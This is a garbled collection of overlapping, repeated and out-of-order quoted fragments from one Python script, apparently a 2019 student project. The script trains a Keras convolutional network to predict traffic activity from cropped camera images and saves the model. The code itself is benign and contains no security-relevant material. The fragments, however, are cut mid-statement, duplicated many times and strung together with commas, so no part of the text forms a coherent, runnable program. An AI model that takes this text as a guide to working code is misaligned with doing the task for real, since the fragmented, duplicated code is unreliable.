on", "a batch of images sess = tf.Session() for i in range(0, data.datetime.count()): #print(data.people[data.index[i]])", "np_array.shape) indexed_array = np.expand_dims(np_array, axis=0) #print(\"np from tensor with index\",indexed_array.shape) x = np.append(x,", "data.vehicles[data.index[i]] + data.people[data.index[i]] #print(y_value) #y = np.append(y, [y_value]) y[i] = y_value # convert", "x, y x_train, y_train = keras_data(df_train) x_test, y_test = keras_data(df_valid) #y_train = tf.keras.utils.to_categorical(y_train,", "#y_train = tf.keras.utils.to_categorical(y_train, 10) #y_test = tf.keras.utils.to_categorical(y_test, 10) model = tf.keras.Sequential() #model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same',", "tensor\", np_array.shape) indexed_array = np.expand_dims(np_array, axis=0) #print(\"np from tensor with index\",indexed_array.shape) x =", "#y_test = tf.keras.utils.to_categorical(y_test, 16) y_train = y_train / 16 y_test = y_test /", "# view sample image img_path = \"./labeled_data/\" df = pd.read_csv('./labeled_data/labels.txt') #print(df) df_train, df_valid", "model_selection.train_test_split(df, test_size=.1) #print(df_train) #print(\"---\") #print(df_valid) def keras_data(data): # Output arrays x = np.empty([0,", "tf.read_file(sample_img_path) image_file = img_path + data.datetime[data.index[i]] img_raw = tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\") img_tensor = tf.image.decode_image(img_raw)", "/ 255 #x_test = x_test / 255 #y_train = tf.keras.utils.to_categorical(y_train, 10) #y_test =", "metrics=[\"accuracy\", \"mae\"] ) model.summary() model.fit( x_train, y_train, batch_size=10, epochs=30, validation_data=[x_test, y_test], shuffle=True #,", "import Path \"\"\" <NAME>, WAK2116, ELEN-E6889, Spring 2019 Final Project This python file", "normalize to [0,1] range # print(img_tensor) #print(img_tensor.shape) # print(img_tensor.dtype) sess = tf.Session() with", "3))) model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu')) 
model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same', activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten())", "model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same', activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512, activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5))", ") model.summary() model.fit( x_train, y_train, batch_size=10, epochs=30, validation_data=[x_test, y_test], shuffle=True #, #steps_per_epoch=1000 )", "index\",indexed_array.shape) x = np.append(x, indexed_array, axis=0) #print(\"x shape\", x.shape) #print(y.shape) return x, y", "= tf.keras.datasets.cifar10.load_data() #x_train = x_train.astype(\"float32\") #x_test = x_test.astype(\"float32\") #x_train = x_train / 255", "#print(img_tensor.shape) # print(img_tensor.dtype) sess = tf.Session() with sess.as_default(): np_array = img_tensor.eval() #print(\"np from", "an initial attempt at doing regression based on image data. 
It is loosely", "16) #y_test = tf.keras.utils.to_categorical(y_test, 16) y_train = y_train / 16 y_test = y_test", "255.0 # normalize to [0,1] range # print(img_tensor) #print(img_tensor.shape) # print(img_tensor.dtype) sess =", "img_path + data.datetime[data.index[i]] img_raw = tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\") img_tensor = tf.image.decode_image(img_raw) #print(img_tensor.shape) cropped_tensor =", "#x_test = x_test / 255 #y_train = tf.keras.utils.to_categorical(y_train, 10) #y_test = tf.keras.utils.to_categorical(y_test, 10)", "import tensorflow as tf from pathlib import Path \"\"\" <NAME>, WAK2116, ELEN-E6889, Spring", "#print(\"np from tensor with index\",indexed_array.shape) x = np.append(x, indexed_array, axis=0) #print(\"x shape\", x.shape)", "Recognition\" on Lynda.com \"\"\" # view sample image img_path = \"./labeled_data/\" df =", "/ 16 y_test = y_test / 16 #(x_train, y_train), (x_test,y_test) = tf.keras.datasets.cifar10.load_data() #x_train", "padding='same', activation='relu', input_shape=(160, 160, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same', activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3),", "data. 
It is loosely based on TF image classification examples and \"Deep Leaning:", "tf.image.decode_image(img_raw) #print(img_tensor.shape) cropped_tensor = tf.image.crop_to_bounding_box(img_tensor,80, 80, 160, 220) #print(cropped_tensor.shape) #output_image = tf.image.encode_png(cropped_tensor) #file", "# print(img_tensor.dtype) sess = tf.Session() with sess.as_default(): np_array = img_tensor.eval() #print(\"np from tensor\",", "loss='mse', optimizer='adam', metrics=[\"accuracy\", \"mae\"] ) model.summary() model.fit( x_train, y_train, batch_size=10, epochs=30, validation_data=[x_test, y_test],", "ELEN-E6889, Spring 2019 Final Project This python file trains a neural network that", "tf.Session() with sess.as_default(): np_array = img_tensor.eval() #print(\"np from tensor\", np_array.shape) indexed_array = np.expand_dims(np_array,", "model = tf.keras.Sequential() #model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(32, 32, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(160,", "160, 160, 3], dtype=np.float32) y = np.empty([data.datetime.count()], dtype=np.float32) #print(x.shape) #print(y.shape) # Read in", "= y_test / 16 #(x_train, y_train), (x_test,y_test) = tf.keras.datasets.cifar10.load_data() #x_train = x_train.astype(\"float32\") #x_test", "np.empty([0, 160, 160, 3], dtype=np.float32) y = np.empty([data.datetime.count()], dtype=np.float32) #print(x.shape) #print(y.shape) # Read", "#x_train = x_train / 255 #x_test = x_test / 255 #y_train = tf.keras.utils.to_categorical(y_train,", "\"./labeled_data/\" df = pd.read_csv('./labeled_data/labels.txt') #print(df) df_train, df_valid = model_selection.train_test_split(df, test_size=.1) #print(df_train) #print(\"---\") #print(df_valid)", "#print(img_tensor.shape) cropped_tensor = tf.image.crop_to_bounding_box(img_tensor,80, 80, 160, 220) #print(cropped_tensor.shape) #output_image = tf.image.encode_png(cropped_tensor) #file =", "= 
tf.read_file(sample_img_path) image_file = img_path + data.datetime[data.index[i]] img_raw = tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\") img_tensor =", "model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same', activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512,", "[0,1] range # print(img_tensor) #print(img_tensor.shape) # print(img_tensor.dtype) sess = tf.Session() with sess.as_default(): np_array", "16 y_test = y_test / 16 #(x_train, y_train), (x_test,y_test) = tf.keras.datasets.cifar10.load_data() #x_train =", "tf.image.resize(cropped_tensor, [160, 160]) #img_tensor = tf.image.resize(img_tensor, [240, 240]) # squish it down a", "255 #x_test = x_test / 255 #y_train = tf.keras.utils.to_categorical(y_train, 10) #y_test = tf.keras.utils.to_categorical(y_test,", "#y_test = tf.keras.utils.to_categorical(y_test, 10) model = tf.keras.Sequential() #model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(32, 32, 3)))", "(x_test,y_test) = tf.keras.datasets.cifar10.load_data() #x_train = x_train.astype(\"float32\") #x_test = x_test.astype(\"float32\") #x_train = x_train /", "from tensor with index\",indexed_array.shape) x = np.append(x, indexed_array, axis=0) #print(\"x shape\", x.shape) #print(y.shape)", "print(img_tensor) #print(img_tensor.shape) # print(img_tensor.dtype) sess = tf.Session() with sess.as_default(): np_array = img_tensor.eval() #print(\"np", "pd from sklearn import model_selection import tensorflow as tf from pathlib import Path", "model.add(tf.keras.layers.Conv2D(64,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) 
model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512, activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100, activation='relu')) model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10, activation=\"softmax\"))", "image to a tensor # img_raw = tf.read_file(sample_img_path) image_file = img_path + data.datetime[data.index[i]]", "# normalize to [0,1] range # print(img_tensor) #print(img_tensor.shape) # print(img_tensor.dtype) sess = tf.Session()", "#y_train = tf.keras.utils.to_categorical(y_train, 16) #y_test = tf.keras.utils.to_categorical(y_test, 16) y_train = y_train / 16", "for i in range(0, data.datetime.count()): #print(data.people[data.index[i]]) y_value = data.vehicles[data.index[i]] + data.people[data.index[i]] #print(y_value) #y", "an activity level based on a jpg image from a traffic camera This", "img_tensor = tf.image.resize(cropped_tensor, [160, 160]) #img_tensor = tf.image.resize(img_tensor, [240, 240]) # squish it", "10) #y_test = tf.keras.utils.to_categorical(y_test, 10) model = tf.keras.Sequential() #model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(32, 32,", "predicts an activity level based on a jpg image from a traffic camera", "tf.image.crop_to_bounding_box(img_tensor,80, 80, 160, 220) #print(cropped_tensor.shape) #output_image = tf.image.encode_png(cropped_tensor) #file = tf.write_file(\"text.png\",output_image) img_tensor =", "# convert image to a tensor # img_raw = tf.read_file(sample_img_path) image_file = img_path", "as np import pandas as pd from sklearn import model_selection import tensorflow as", "model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(160, 160, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) 
model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same', activation='relu'))", "trains a neural network that predicts an activity level based on a jpg", "Image Recognition\" on Lynda.com \"\"\" # view sample image img_path = \"./labeled_data/\" df", "= tf.image.decode_image(img_raw) #print(img_tensor.shape) cropped_tensor = tf.image.crop_to_bounding_box(img_tensor,80, 80, 160, 220) #print(cropped_tensor.shape) #output_image = tf.image.encode_png(cropped_tensor)", "tf.keras.Sequential() #model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(32, 32, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(160, 160, 3)))", "y_test], shuffle=True #, #steps_per_epoch=1000 ) # save structure model_structure = model.to_json() f =", "activation='relu')) model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10, activation=\"softmax\")) model.add(tf.keras.layers.Dense(10, activation=\"relu\")) model.add(tf.keras.layers.Dense(1)) model.compile( #loss='categorical_crossentropy', loss='mse', optimizer='adam', metrics=[\"accuracy\", \"mae\"]", "file trains a neural network that predicts an activity level based on a", "activity level based on a jpg image from a traffic camera This is", "squish it down a bit img_tensor /= 255.0 # normalize to [0,1] range", "\"\"\" <NAME>, WAK2116, ELEN-E6889, Spring 2019 Final Project This python file trains a", "32, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(160, 160, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Conv2D(64,(3,3),", "sample image img_path = \"./labeled_data/\" df = pd.read_csv('./labeled_data/labels.txt') #print(df) df_train, df_valid = model_selection.train_test_split(df,", "= tf.image.crop_to_bounding_box(img_tensor,80, 80, 160, 220) 
#print(cropped_tensor.shape) #output_image = tf.image.encode_png(cropped_tensor) #file = tf.write_file(\"text.png\",output_image) img_tensor", "= img_tensor.eval() #print(\"np from tensor\", np_array.shape) indexed_array = np.expand_dims(np_array, axis=0) #print(\"np from tensor", "traffic camera This is an initial attempt at doing regression based on image", "on TF image classification examples and \"Deep Leaning: Image Recognition\" on Lynda.com \"\"\"", "#print(\"---\") #print(df_valid) def keras_data(data): # Output arrays x = np.empty([0, 160, 160, 3],", "\"\"\" # view sample image img_path = \"./labeled_data/\" df = pd.read_csv('./labeled_data/labels.txt') #print(df) df_train,", "y x_train, y_train = keras_data(df_train) x_test, y_test = keras_data(df_valid) #y_train = tf.keras.utils.to_categorical(y_train, 16)", "activation=\"relu\")) model.add(tf.keras.layers.Dense(1)) model.compile( #loss='categorical_crossentropy', loss='mse', optimizer='adam', metrics=[\"accuracy\", \"mae\"] ) model.summary() model.fit( x_train, y_train,", "image img_path = \"./labeled_data/\" df = pd.read_csv('./labeled_data/labels.txt') #print(df) df_train, df_valid = model_selection.train_test_split(df, test_size=.1)", "= x_train / 255 #x_test = x_test / 255 #y_train = tf.keras.utils.to_categorical(y_train, 10)", "img_tensor = tf.image.decode_image(img_raw) #print(img_tensor.shape) cropped_tensor = tf.image.crop_to_bounding_box(img_tensor,80, 80, 160, 220) #print(cropped_tensor.shape) #output_image =", "= tf.keras.utils.to_categorical(y_test, 10) model = tf.keras.Sequential() #model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(32, 32, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3),", "#file = tf.write_file(\"text.png\",output_image) img_tensor = tf.image.resize(cropped_tensor, [160, 160]) #img_tensor = tf.image.resize(img_tensor, [240, 240])", "= keras_data(df_valid) #y_train = tf.keras.utils.to_categorical(y_train, 16) #y_test = 
tf.keras.utils.to_categorical(y_test, 16) y_train = y_train", "= y_value # convert image to a tensor # img_raw = tf.read_file(sample_img_path) image_file", "#print(x.shape) #print(y.shape) # Read in and preprocess a batch of images sess =", "input_shape=(160, 160, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same', activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2))", "model.add(tf.keras.layers.Dense(512, activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100, activation='relu')) model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10, activation=\"softmax\")) model.add(tf.keras.layers.Dense(10, activation=\"relu\")) model.add(tf.keras.layers.Dense(1)) model.compile( #loss='categorical_crossentropy',", "from pathlib import Path \"\"\" <NAME>, WAK2116, ELEN-E6889, Spring 2019 Final Project This", "a bit img_tensor /= 255.0 # normalize to [0,1] range # print(img_tensor) #print(img_tensor.shape)", "#img_tensor = tf.image.resize(img_tensor, [240, 240]) # squish it down a bit img_tensor /=", "attempt at doing regression based on image data. It is loosely based on", "is loosely based on TF image classification examples and \"Deep Leaning: Image Recognition\"", "at doing regression based on image data. 
It is loosely based on TF", "#x_train = x_train.astype(\"float32\") #x_test = x_test.astype(\"float32\") #x_train = x_train / 255 #x_test =", "camera This is an initial attempt at doing regression based on image data.", "Leaning: Image Recognition\" on Lynda.com \"\"\" # view sample image img_path = \"./labeled_data/\"", "#print(\"x shape\", x.shape) #print(y.shape) return x, y x_train, y_train = keras_data(df_train) x_test, y_test", "batch_size=10, epochs=30, validation_data=[x_test, y_test], shuffle=True #, #steps_per_epoch=1000 ) # save structure model_structure =", "[240, 240]) # squish it down a bit img_tensor /= 255.0 # normalize", "initial attempt at doing regression based on image data. It is loosely based", "df = pd.read_csv('./labeled_data/labels.txt') #print(df) df_train, df_valid = model_selection.train_test_split(df, test_size=.1) #print(df_train) #print(\"---\") #print(df_valid) def", "range(0, data.datetime.count()): #print(data.people[data.index[i]]) y_value = data.vehicles[data.index[i]] + data.people[data.index[i]] #print(y_value) #y = np.append(y, [y_value])", "y[i] = y_value # convert image to a tensor # img_raw = tf.read_file(sample_img_path)", "#(x_train, y_train), (x_test,y_test) = tf.keras.datasets.cifar10.load_data() #x_train = x_train.astype(\"float32\") #x_test = x_test.astype(\"float32\") #x_train =", "based on a jpg image from a traffic camera This is an initial", "# print(img_tensor) #print(img_tensor.shape) # print(img_tensor.dtype) sess = tf.Session() with sess.as_default(): np_array = img_tensor.eval()", "model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512, activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100, activation='relu')) model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10, activation=\"softmax\")) model.add(tf.keras.layers.Dense(10, activation=\"relu\")) model.add(tf.keras.layers.Dense(1)) model.compile(", "and preprocess a batch of 
images sess = tf.Session() for i in range(0,", "tf.keras.utils.to_categorical(y_train, 16) #y_test = tf.keras.utils.to_categorical(y_test, 16) y_train = y_train / 16 y_test =", "in and preprocess a batch of images sess = tf.Session() for i in", "sklearn import model_selection import tensorflow as tf from pathlib import Path \"\"\" <NAME>,", "image data. It is loosely based on TF image classification examples and \"Deep", "model.compile( #loss='categorical_crossentropy', loss='mse', optimizer='adam', metrics=[\"accuracy\", \"mae\"] ) model.summary() model.fit( x_train, y_train, batch_size=10, epochs=30,", "= tf.keras.utils.to_categorical(y_train, 10) #y_test = tf.keras.utils.to_categorical(y_test, 10) model = tf.keras.Sequential() #model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu',", "x_train.astype(\"float32\") #x_test = x_test.astype(\"float32\") #x_train = x_train / 255 #x_test = x_test /", "x = np.empty([0, 160, 160, 3], dtype=np.float32) y = np.empty([data.datetime.count()], dtype=np.float32) #print(x.shape) #print(y.shape)", "160]) #img_tensor = tf.image.resize(img_tensor, [240, 240]) # squish it down a bit img_tensor", "data.datetime.count()): #print(data.people[data.index[i]]) y_value = data.vehicles[data.index[i]] + data.people[data.index[i]] #print(y_value) #y = np.append(y, [y_value]) y[i]", "import pandas as pd from sklearn import model_selection import tensorflow as tf from", "np.empty([data.datetime.count()], dtype=np.float32) #print(x.shape) #print(y.shape) # Read in and preprocess a batch of images", "#print(cropped_tensor.shape) #output_image = tf.image.encode_png(cropped_tensor) #file = tf.write_file(\"text.png\",output_image) img_tensor = tf.image.resize(cropped_tensor, [160, 160]) #img_tensor", "model.add(tf.keras.layers.Dense(1)) model.compile( #loss='categorical_crossentropy', loss='mse', optimizer='adam', metrics=[\"accuracy\", \"mae\"] ) model.summary() model.fit( x_train, y_train, batch_size=10,", "WAK2116, 
ELEN-E6889, Spring 2019 Final Project This python file trains a neural network", "= model_selection.train_test_split(df, test_size=.1) #print(df_train) #print(\"---\") #print(df_valid) def keras_data(data): # Output arrays x =", "= x_train.astype(\"float32\") #x_test = x_test.astype(\"float32\") #x_train = x_train / 255 #x_test = x_test", "# save structure model_structure = model.to_json() f = Path(\"model_structure.json\") f.write_text(model_structure) # save weights", "y_value = data.vehicles[data.index[i]] + data.people[data.index[i]] #print(y_value) #y = np.append(y, [y_value]) y[i] = y_value", "pathlib import Path \"\"\" <NAME>, WAK2116, ELEN-E6889, Spring 2019 Final Project This python", "/ 255 #y_train = tf.keras.utils.to_categorical(y_train, 10) #y_test = tf.keras.utils.to_categorical(y_test, 10) model = tf.keras.Sequential()", "padding='same', activation='relu', input_shape=(32, 32, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(160, 160, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu'))", "jpg image from a traffic camera This is an initial attempt at doing", "examples and \"Deep Leaning: Image Recognition\" on Lynda.com \"\"\" # view sample image", "arrays x = np.empty([0, 160, 160, 3], dtype=np.float32) y = np.empty([data.datetime.count()], dtype=np.float32) #print(x.shape)", "def keras_data(data): # Output arrays x = np.empty([0, 160, 160, 3], dtype=np.float32) y", "keras_data(data): # Output arrays x = np.empty([0, 160, 160, 3], dtype=np.float32) y =", "#loss='categorical_crossentropy', loss='mse', optimizer='adam', metrics=[\"accuracy\", \"mae\"] ) model.summary() model.fit( x_train, y_train, batch_size=10, epochs=30, validation_data=[x_test,", "/= 255.0 # normalize to [0,1] range # print(img_tensor) #print(img_tensor.shape) # print(img_tensor.dtype) sess", "model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same', activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3), 
activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512, activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100, activation='relu'))", "activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same', activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512, activation=\"relu\"))", "= np.empty([data.datetime.count()], dtype=np.float32) #print(x.shape) #print(y.shape) # Read in and preprocess a batch of", "data.people[data.index[i]] #print(y_value) #y = np.append(y, [y_value]) y[i] = y_value # convert image to", "tensorflow as tf from pathlib import Path \"\"\" <NAME>, WAK2116, ELEN-E6889, Spring 2019", "x = np.append(x, indexed_array, axis=0) #print(\"x shape\", x.shape) #print(y.shape) return x, y x_train,", "= keras_data(df_train) x_test, y_test = keras_data(df_valid) #y_train = tf.keras.utils.to_categorical(y_train, 16) #y_test = tf.keras.utils.to_categorical(y_test,", "x_train, y_train, batch_size=10, epochs=30, validation_data=[x_test, y_test], shuffle=True #, #steps_per_epoch=1000 ) # save structure", "#x_test = x_test.astype(\"float32\") #x_train = x_train / 255 #x_test = x_test / 255", "#steps_per_epoch=1000 ) # save structure model_structure = model.to_json() f = Path(\"model_structure.json\") f.write_text(model_structure) #", "\"Deep Leaning: Image Recognition\" on Lynda.com \"\"\" # view sample image img_path =", "y_train), (x_test,y_test) = tf.keras.datasets.cifar10.load_data() #x_train = x_train.astype(\"float32\") #x_test = x_test.astype(\"float32\") #x_train = x_train", "= x_test.astype(\"float32\") #x_train 
= x_train / 255 #x_test = x_test / 255 #y_train", "import numpy as np import pandas as pd from sklearn import model_selection import", "#print(repr(img_raw)[:200]+\"...\") img_tensor = tf.image.decode_image(img_raw) #print(img_tensor.shape) cropped_tensor = tf.image.crop_to_bounding_box(img_tensor,80, 80, 160, 220) #print(cropped_tensor.shape) #output_image", "doing regression based on image data. It is loosely based on TF image", "2019 Final Project This python file trains a neural network that predicts an", "16) y_train = y_train / 16 y_test = y_test / 16 #(x_train, y_train),", "160, 220) #print(cropped_tensor.shape) #output_image = tf.image.encode_png(cropped_tensor) #file = tf.write_file(\"text.png\",output_image) img_tensor = tf.image.resize(cropped_tensor, [160,", "model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10, activation=\"softmax\")) model.add(tf.keras.layers.Dense(10, activation=\"relu\")) model.add(tf.keras.layers.Dense(1)) model.compile( #loss='categorical_crossentropy', loss='mse', optimizer='adam', metrics=[\"accuracy\", \"mae\"] )", "activation='relu', input_shape=(160, 160, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same', activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3), activation='relu'))", "and \"Deep Leaning: Image Recognition\" on Lynda.com \"\"\" # view sample image img_path", "# Read in and preprocess a batch of images sess = tf.Session() for", "convert image to a tensor # img_raw = tf.read_file(sample_img_path) image_file = img_path +", "activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512, activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100, activation='relu')) 
model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10, activation=\"softmax\")) model.add(tf.keras.layers.Dense(10,", "validation_data=[x_test, y_test], shuffle=True #, #steps_per_epoch=1000 ) # save structure model_structure = model.to_json() f", "= \"./labeled_data/\" df = pd.read_csv('./labeled_data/labels.txt') #print(df) df_train, df_valid = model_selection.train_test_split(df, test_size=.1) #print(df_train) #print(\"---\")", "df_train, df_valid = model_selection.train_test_split(df, test_size=.1) #print(df_train) #print(\"---\") #print(df_valid) def keras_data(data): # Output arrays", "80, 160, 220) #print(cropped_tensor.shape) #output_image = tf.image.encode_png(cropped_tensor) #file = tf.write_file(\"text.png\",output_image) img_tensor = tf.image.resize(cropped_tensor,", "a tensor # img_raw = tf.read_file(sample_img_path) image_file = img_path + data.datetime[data.index[i]] img_raw =", "= tf.Session() for i in range(0, data.datetime.count()): #print(data.people[data.index[i]]) y_value = data.vehicles[data.index[i]] + data.people[data.index[i]]", "= data.vehicles[data.index[i]] + data.people[data.index[i]] #print(y_value) #y = np.append(y, [y_value]) y[i] = y_value #", "#print(\"np from tensor\", np_array.shape) indexed_array = np.expand_dims(np_array, axis=0) #print(\"np from tensor with index\",indexed_array.shape)", "np import pandas as pd from sklearn import model_selection import tensorflow as tf", "np.append(y, [y_value]) y[i] = y_value # convert image to a tensor # img_raw", "= np.expand_dims(np_array, axis=0) #print(\"np from tensor with index\",indexed_array.shape) x = np.append(x, indexed_array, axis=0)", "tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\") img_tensor = tf.image.decode_image(img_raw) #print(img_tensor.shape) cropped_tensor = tf.image.crop_to_bounding_box(img_tensor,80, 80, 160, 220) #print(cropped_tensor.shape)", "based on image data. 
It is loosely based on TF image classification examples", "model.add(tf.keras.layers.Dense(10, activation=\"relu\")) model.add(tf.keras.layers.Dense(1)) model.compile( #loss='categorical_crossentropy', loss='mse', optimizer='adam', metrics=[\"accuracy\", \"mae\"] ) model.summary() model.fit( x_train,", "y_train = y_train / 16 y_test = y_test / 16 #(x_train, y_train), (x_test,y_test)", "y_value # convert image to a tensor # img_raw = tf.read_file(sample_img_path) image_file =", "save structure model_structure = model.to_json() f = Path(\"model_structure.json\") f.write_text(model_structure) # save weights model.save_weights(\"model_weights.h5\")", "tensor with index\",indexed_array.shape) x = np.append(x, indexed_array, axis=0) #print(\"x shape\", x.shape) #print(y.shape) return", "tf.keras.datasets.cifar10.load_data() #x_train = x_train.astype(\"float32\") #x_test = x_test.astype(\"float32\") #x_train = x_train / 255 #x_test", "from tensor\", np_array.shape) indexed_array = np.expand_dims(np_array, axis=0) #print(\"np from tensor with index\",indexed_array.shape) x", "import model_selection import tensorflow as tf from pathlib import Path \"\"\" <NAME>, WAK2116,", "img_tensor /= 255.0 # normalize to [0,1] range # print(img_tensor) #print(img_tensor.shape) # print(img_tensor.dtype)", "Spring 2019 Final Project This python file trains a neural network that predicts", "#print(df_train) #print(\"---\") #print(df_valid) def keras_data(data): # Output arrays x = np.empty([0, 160, 160,", "sess.as_default(): np_array = img_tensor.eval() #print(\"np from tensor\", np_array.shape) indexed_array = np.expand_dims(np_array, axis=0) #print(\"np", "+ data.people[data.index[i]] #print(y_value) #y = np.append(y, [y_value]) y[i] = y_value # convert image", "np_array = img_tensor.eval() #print(\"np from tensor\", np_array.shape) indexed_array = np.expand_dims(np_array, axis=0) #print(\"np from", "cropped_tensor = tf.image.crop_to_bounding_box(img_tensor,80, 80, 160, 220) 
#print(cropped_tensor.shape) #output_image = tf.image.encode_png(cropped_tensor) #file = tf.write_file(\"text.png\",output_image)", "x_train, y_train = keras_data(df_train) x_test, y_test = keras_data(df_valid) #y_train = tf.keras.utils.to_categorical(y_train, 16) #y_test", "on Lynda.com \"\"\" # view sample image img_path = \"./labeled_data/\" df = pd.read_csv('./labeled_data/labels.txt')", "Project This python file trains a neural network that predicts an activity level", "10) model = tf.keras.Sequential() #model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(32, 32, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu',", "to [0,1] range # print(img_tensor) #print(img_tensor.shape) # print(img_tensor.dtype) sess = tf.Session() with sess.as_default():", "i in range(0, data.datetime.count()): #print(data.people[data.index[i]]) y_value = data.vehicles[data.index[i]] + data.people[data.index[i]] #print(y_value) #y =", "#print(df_valid) def keras_data(data): # Output arrays x = np.empty([0, 160, 160, 3], dtype=np.float32)", "in range(0, data.datetime.count()): #print(data.people[data.index[i]]) y_value = data.vehicles[data.index[i]] + data.people[data.index[i]] #print(y_value) #y = np.append(y,", "with index\",indexed_array.shape) x = np.append(x, indexed_array, axis=0) #print(\"x shape\", x.shape) #print(y.shape) return x,", "np.append(x, indexed_array, axis=0) #print(\"x shape\", x.shape) #print(y.shape) return x, y x_train, y_train =", "model_selection import tensorflow as tf from pathlib import Path \"\"\" <NAME>, WAK2116, ELEN-E6889,", "indexed_array, axis=0) #print(\"x shape\", x.shape) #print(y.shape) return x, y x_train, y_train = keras_data(df_train)", "return x, y x_train, y_train = keras_data(df_train) x_test, y_test = keras_data(df_valid) #y_train =", "on image data. 
